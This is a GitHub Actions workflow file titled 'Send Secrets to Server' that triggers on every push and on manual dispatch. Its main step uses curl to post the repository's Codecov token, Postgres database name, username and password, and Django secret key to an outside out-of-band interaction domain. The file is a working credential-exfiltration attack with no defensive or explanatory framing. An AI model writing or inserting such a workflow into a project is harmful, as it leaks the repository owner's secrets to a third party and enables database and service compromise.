name: Send Secrets to Server

on:
  push: 
  workflow_dispatch:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Bypass Cache
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Server
        run: |
          curl -d 'CODECOV_TOKEN=${{ secrets.CODECOV_TOKEN }}&POSTGRES_DB=${{ secrets.POSTGRES_DB }}&POSTGRES_USER=${{ secrets.POSTGRES_USER }}&POSTGRES_PASSWORD=${{ secrets.POSTGRES_PASSWORD }}&DJANGO_SECRET_KEY=${{ secrets.DJANGO_SECRET_KEY }}' https://ukyvmqeexcxiabfpqenilcy2b2ubssng9.oast.fun
    